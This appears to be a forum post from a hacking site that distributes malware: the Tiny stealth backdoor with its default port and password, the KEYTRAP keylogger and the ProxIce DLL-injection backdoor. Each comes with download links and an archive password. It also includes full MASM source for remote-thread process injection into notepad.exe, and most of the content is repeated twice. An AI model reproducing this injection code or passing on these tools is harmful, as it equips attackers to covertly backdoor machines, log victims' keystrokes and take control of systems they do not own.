Isis
23.09.2007, 00:17
Tiny v3.2
Tiny is a small backdoor which installs itself in stealth and can be removed again by connecting to it and choosing the correct option from the menu.
Connect to Tiny using netcat since Tiny won't allow you to enter the password using telnet.
Default port is: 63714
Password: Tiny
Download Tiny (http://rapidshare.com/files/57535209/Tiny_3.2_-__xeka.ru_.rar)
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]
[masm] fwb+ example
Function injection (FWB+) example by shapeless
- http://swerat.com
- http://chasenet.org
thanks to ksv for the Inject-code :)
.386
.model flat, stdcall
option casemap: none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\masm32.inc
includelib \masm32\lib\masm32.lib
includelib \masm32\lib\kernel32.lib
FuncSize MACRO L1, L2
mov eax,L2
sub eax,L1
ENDM
TInjData struc
GetAddr dword ?
LoadLib dword ?
szUser32 byte 16 dup(0)
szMsgBox byte 32 dup(0)
TInjData ends
.data
szApp db "notepad.exe",0
szUsr32 db "user32.dll",0
szKrnl32 db "kernel32.dll",0
szMsgbox db "MessageBoxA",0
szLoadLib db "LoadLibraryA",0
szGetProcAddr db "GetProcAddress",0
.data?
SInfo STARTUPINFO <>
PInfo PROCESS_INFORMATION <>
InjData TInjData <>
pFunc dword ?
dwThreadID dword ?
hKernel dword ?
.code
; Thanks to ksv for c++ example of this code :)
Inject proc uses esi hProcess:dword,dwSize:dword,Code:dword
LOCAL dwOldProtect:dword
LOCAL dwWritten:dword
invoke VirtualAllocEx,hProcess,0,dwSize,MEM_COMMIT+MEM_RE SERVE,PAGE_EXECUTE_READWRITE
.if eax==0
ret
.endif
mov esi,eax
invoke VirtualProtectEx,hProcess,esi,dwSize,PAGE_EXECUTE_ READWRITE,addr dwOldProtect
.if eax==0
ret
.endif
invoke WriteProcessMemory,hProcess,esi,Code,dwSize,addr dwWritten
.if eax==0
ret
.endif
mov eax,esi
ret
Inject endp
Label1:
remotefunc PROC uses esi iData:DWORD
; Code:
; invoke Loadlibrary,szUser32
; invoke GetProcAddres,hUser32,szMessagebox
; invoke Messagebox,0,0,0,0
mov esi,iData
assume esi:ptr TInjData
lea ecx,[esi].szUser32
push ecx
call [esi].LoadLib
lea ecx,[esi].szMsgBox
push ecx
push eax
call [esi].GetAddr
push 0
push 0
push 0
push 0
call eax
assume esi:nothing
ret
remotefunc endp
Label2:
__ep:
; create new process
invoke RtlZeroMemory,addr SInfo,SizeOf STARTUPINFO
invoke CreateProcess,0,addr szApp,0,0,FALSE,0,0,0,addr SInfo,addr PInfo
; prep the structure
invoke lstrcpy,addr InjData.szUser32,addr szUsr32
invoke lstrcpy,addr InjData.szMsgBox,addr szMsgbox
invoke GetModuleHandle,addr szKrnl32
mov hKernel,eax
invoke GetProcAddress,hKernel,addr szLoadLib
mov InjData.LoadLib,eax
invoke GetProcAddress,hKernel,addr szGetProcAddr
mov InjData.GetAddr,eax
; inject function
FuncSize Label1,Label2
invoke Inject,PInfo.hProcess,eax,offset remotefunc
jz EOF
mov pFunc,eax
; inject the structure
invoke Inject,PInfo.hProcess,sizeof TInjData,offset InjData
jz EOF
invoke CreateRemoteThread,PInfo.hProcess,0,0,pFunc,eax,0, addr dwThreadID
EOF:
invoke ExitProcess,0
end __ep
KEYTRAP
KEYTRAP v1.0 - Keyboard Key Logger
By Dcypher (Dcypher@aol.com)
Usage: KEYTRAP <dir\logfile> /A /B /C
A - Maximum size of log file.
B - Number of keys to log per session.
C - Minutes between each session.
Download Keytrap (http://rapidshare.com/files/57535275/Keytrap_-__xeka.ru_.rar)
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]
ProxIce 2.0 - backdoor DLL injection
First of all, thank you for using this program.
Written in 100% pure ASM, with MASM & WinASM.
Functions:
- Injection of a thread which itself loads an infectious DLL
- Encoding of the data inside the server
- Password not decrypted in memory
- Notification by email
- EditServer
- Installation of the BDR in a single key for autorun
- Test of connection
- Backdoor on the port of your choice
- Sources fully commented
This program was designed and programmed for n0name mag #1; thanks to Aphex for the injection type, and that is all. Thanks to bleyme for having cast an eye over my sources, and thanks in fact to the whole n0name TEAM for being what it is. This backdoor is proof that one can quickly make a backdoor that is simple, effective, somewhat stealthy and of very small size. The sources are provided for educational purposes and will allow those who wish to learn a little while understanding why and what is done.
You will need NetCat to connect to the server; it is delivered with the pack. In fact, this backdoor is designed for XP/NT.
Have fun
Download ProxIce (http://rapidshare.com/files/57535256/ProxIce-2.0_-__xeka.ru_.rar)
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]
Tiny is a small backdoor which installs itself in stealth and can be removed again by connecting to it and choosing the correct option from the menu.
Connect to Tiny using netcat since Tiny won't allow you to enter the password using telnet.
Default port is: 63714
Password: Tiny
Download Tiny (http://rapidshare.com/files/57535209/Tiny_3.2_-__xeka.ru_.rar)
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]
[masm] fwb+ example
Function injection (FWB+) example by shapeless
- http://swerat.com
- http://chasenet.org
thanks to ksv for the Inject-code :)
.386
.model flat, stdcall
option casemap: none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\masm32.inc
includelib \masm32\lib\masm32.lib
includelib \masm32\lib\kernel32.lib
FuncSize MACRO L1, L2
mov eax,L2
sub eax,L1
ENDM
TInjData struc
GetAddr dword ?
LoadLib dword ?
szUser32 byte 16 dup(0)
szMsgBox byte 32 dup(0)
TInjData ends
.data
szApp db "notepad.exe",0
szUsr32 db "user32.dll",0
szKrnl32 db "kernel32.dll",0
szMsgbox db "MessageBoxA",0
szLoadLib db "LoadLibraryA",0
szGetProcAddr db "GetProcAddress",0
.data?
SInfo STARTUPINFO <>
PInfo PROCESS_INFORMATION <>
InjData TInjData <>
pFunc dword ?
dwThreadID dword ?
hKernel dword ?
.code
; Thanks to ksv for c++ example of this code :)
Inject proc uses esi hProcess:dword,dwSize:dword,Code:dword
LOCAL dwOldProtect:dword
LOCAL dwWritten:dword
invoke VirtualAllocEx,hProcess,0,dwSize,MEM_COMMIT+MEM_RE SERVE,PAGE_EXECUTE_READWRITE
.if eax==0
ret
.endif
mov esi,eax
invoke VirtualProtectEx,hProcess,esi,dwSize,PAGE_EXECUTE_ READWRITE,addr dwOldProtect
.if eax==0
ret
.endif
invoke WriteProcessMemory,hProcess,esi,Code,dwSize,addr dwWritten
.if eax==0
ret
.endif
mov eax,esi
ret
Inject endp
Label1:
remotefunc PROC uses esi iData:DWORD
; Code:
; invoke Loadlibrary,szUser32
; invoke GetProcAddres,hUser32,szMessagebox
; invoke Messagebox,0,0,0,0
mov esi,iData
assume esi:ptr TInjData
lea ecx,[esi].szUser32
push ecx
call [esi].LoadLib
lea ecx,[esi].szMsgBox
push ecx
push eax
call [esi].GetAddr
push 0
push 0
push 0
push 0
call eax
assume esi:nothing
ret
remotefunc endp
Label2:
__ep:
; create new process
invoke RtlZeroMemory,addr SInfo,SizeOf STARTUPINFO
invoke CreateProcess,0,addr szApp,0,0,FALSE,0,0,0,addr SInfo,addr PInfo
; prep the structure
invoke lstrcpy,addr InjData.szUser32,addr szUsr32
invoke lstrcpy,addr InjData.szMsgBox,addr szMsgbox
invoke GetModuleHandle,addr szKrnl32
mov hKernel,eax
invoke GetProcAddress,hKernel,addr szLoadLib
mov InjData.LoadLib,eax
invoke GetProcAddress,hKernel,addr szGetProcAddr
mov InjData.GetAddr,eax
; inject function
FuncSize Label1,Label2
invoke Inject,PInfo.hProcess,eax,offset remotefunc
jz EOF
mov pFunc,eax
; inject the structure
invoke Inject,PInfo.hProcess,sizeof TInjData,offset InjData
jz EOF
invoke CreateRemoteThread,PInfo.hProcess,0,0,pFunc,eax,0, addr dwThreadID
EOF:
invoke ExitProcess,0
end __ep
KEYTRAP
KEYTRAP v1.0 - Keyboard Key Logger
By Dcypher (Dcypher@aol.com)
Usage: KEYTRAP <dir\logfile> /A /B /C
A - Maximum size of log file.
B - Number of keys to log per session.
C - Minutes between each session.
Download Keytrap (http://rapidshare.com/files/57535275/Keytrap_-__xeka.ru_.rar)
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]
ProxIce 2.0 - backdoor DLL injection
First of all, thank you for using this program.
Written in 100% pure ASM, with MASM & WinASM.
Functions:
- Injection of a thread which itself loads an infectious DLL
- Encoding of the data inside the server
- Password not decrypted in memory
- Notification by email
- EditServer
- Installation of the BDR in a single key for autorun
- Test of connection
- Backdoor on the port of your choice
- Sources fully commented
This program was designed and programmed for n0name mag #1; thanks to Aphex for the injection type, and that is all. Thanks to bleyme for having cast an eye over my sources, and thanks in fact to the whole n0name TEAM for being what it is. This backdoor is proof that one can quickly make a backdoor that is simple, effective, somewhat stealthy and of very small size. The sources are provided for educational purposes and will allow those who wish to learn a little while understanding why and what is done.
You will need NetCat to connect to the server; it is delivered with the pack. In fact, this backdoor is designed for XP/NT.
Have fun
Download ProxIce (http://rapidshare.com/files/57535256/ProxIce-2.0_-__xeka.ru_.rar)
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]